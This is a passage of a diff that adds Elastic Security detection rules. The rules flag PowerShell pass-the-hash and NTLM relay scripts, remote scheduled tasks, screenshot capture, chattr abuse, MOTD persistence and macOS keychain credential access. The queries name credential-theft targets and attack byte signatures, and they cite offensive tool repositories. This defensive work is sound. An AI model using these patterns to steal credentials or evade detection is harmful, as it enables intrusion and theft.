ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1615", + "name": "Group Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1615/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "94a401ba-4fa2-455c-b7ae-b6e037afc0b7_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/951779c2-82ad-4a6c-82b8-296c1f691449_1.json b/packages/security_detection_engine/kibana/security_rule/951779c2-82ad-4a6c-82b8-296c1f691449_1.json new file mode 100644 index 00000000000..89b38e7a087 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/951779c2-82ad-4a6c-82b8-296c1f691449_1.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can execute pass-the-hash (PtH) attacks, intercept and relay NTLM challenges, and carry out other man-in-the-middle (MitM) attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential PowerShell Pass-the-Hash/Relay Script", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\"NTLMSSPNegotiate\" and (\"NegotiateSMB\" or \"NegotiateSMB2\")) or\n \"4E544C4D53535000\" or\n \"0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50\" or\n \"0x4e,0x54,0x20,0x4c,0x4d\" or\n \"0x53,0x4d,0x42,0x20,0x32\" or\n \"0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38\"\n )\n", + "references": [ + "https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1", + "https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1", + "https://github.com/dafthack/Check-LocalAdminHash/blob/master/Check-LocalAdminHash.ps1", + "https://github.com/nettitude/PoshC2/blob/master/resources/modules/Invoke-Tater.ps1", + "https://github.com/Kevin-Robertson/Inveigh/blob/master/Inveigh.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "951779c2-82ad-4a6c-82b8-296c1f691449", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1557", + "name": "Adversary-in-the-Middle", + "reference": "https://attack.mitre.org/techniques/T1557/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.002", + "name": "Pass the Hash", + "reference": "https://attack.mitre.org/techniques/T1550/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "951779c2-82ad-4a6c-82b8-296c1f691449_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_107.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_107.json new file mode 100644 index 00000000000..4875d380856 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_107.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote scheduled task creations on a target host. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Scheduled Task Creation", + "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where host.os.type == \"windows\" and registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "954ee7c8-5437-49ae-b2d6-2960883898e9", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "954ee7c8-5437-49ae-b2d6-2960883898e9_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_108.json b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_108.json new file mode 100644 index 00000000000..60ad3ac18fb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/959a7353-1129-4aa7-9084-30746b256a70_108.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can take screenshots, which is a common feature in post-exploitation kits and remote access tools (RATs).", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Script with Screenshot Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Screenshot Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, which makes it available for use in various environments and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities and take screen captures of desktops to gather information over the course of an operation.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to take screenshots, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n CopyFromScreen and\n (\"System.Drawing.Bitmap\" or \"Drawing.Bitmap\")\n ) and not user.id : \"S-1-5-18\"\n", + "references": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1113", + "name": "Screen Capture", + "reference": "https://attack.mitre.org/techniques/T1113/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "959a7353-1129-4aa7-9084-30746b256a70_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_111.json b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_111.json new file mode 100644 index 00000000000..ef0c1868905 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/968ccab9-da51-4a87-9ce2-d3c9782fd759_111.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.).", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "File made Immutable by Chattr", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and user.id == \"0\" and\n process.executable : \"/usr/bin/chattr\" and process.args : (\"-*i*\", \"+*i*\") and\n not process.parent.executable: (\"/lib/systemd/systemd\", \"/usr/local/uems_agent/bin/*\", \"/usr/lib/systemd/systemd\") and\n not process.parent.name in (\"systemd\", \"cf-agent\", \"ntpdate\", \"xargs\", \"px\", \"preinst\", \"auth\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/", + "subtechnique": [ + { + "id": "T1222.002", + "name": "Linux and Mac File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "968ccab9-da51-4a87-9ce2-d3c9782fd759_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_9.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_9.json new file mode 100644 index 00000000000..8e88cf1e2ed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_9.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the \"/etc/update-motd.d/\" and \"/usr/lib/update-notifier/\" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the creation of potentially malicious files within the default MOTD file directories.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through MOTD File Creation Detected", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type :linux and event.action:(creation or file_create_event or rename or file_rename_event) and\nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : (\n dpkg or dockerd or rpm or executor or dnf or podman or ln or yum \n) and not (\n (process.name:mv and file.extension:dpkg-remove) or\n (file.extension:(swp or swpx))\n)\n", + "references": [ + "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "96d11d31-9a79-480f-8401-da28b194608f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "96d11d31-9a79-480f-8401-da28b194608f_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_107.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_107.json new file mode 100644 index 00000000000..dd24f7afa2c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_107.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes and certificates.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Access to Keychain Credentials Directories", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.args :\n (\n \"/Users/*/Library/Keychains/*\",\n \"/Library/Keychains/*\",\n \"/Network/Library/Keychains/*\",\n \"System.keychain\",\n \"login.keychain-db\",\n \"login.keychain\"\n ) and\n not process.args : (\"find-certificate\",\n \"add-trusted-cert\",\n \"set-keychain-settings\",\n \"delete-certificate\",\n \"/Users/*/Library/Keychains/openvpn.keychain-db\",\n \"show-keychain-info\",\n \"lock-keychain\",\n \"set-key-partition-list\",\n \"import\",\n \"find-identity\") and\n not process.parent.executable :\n (\n 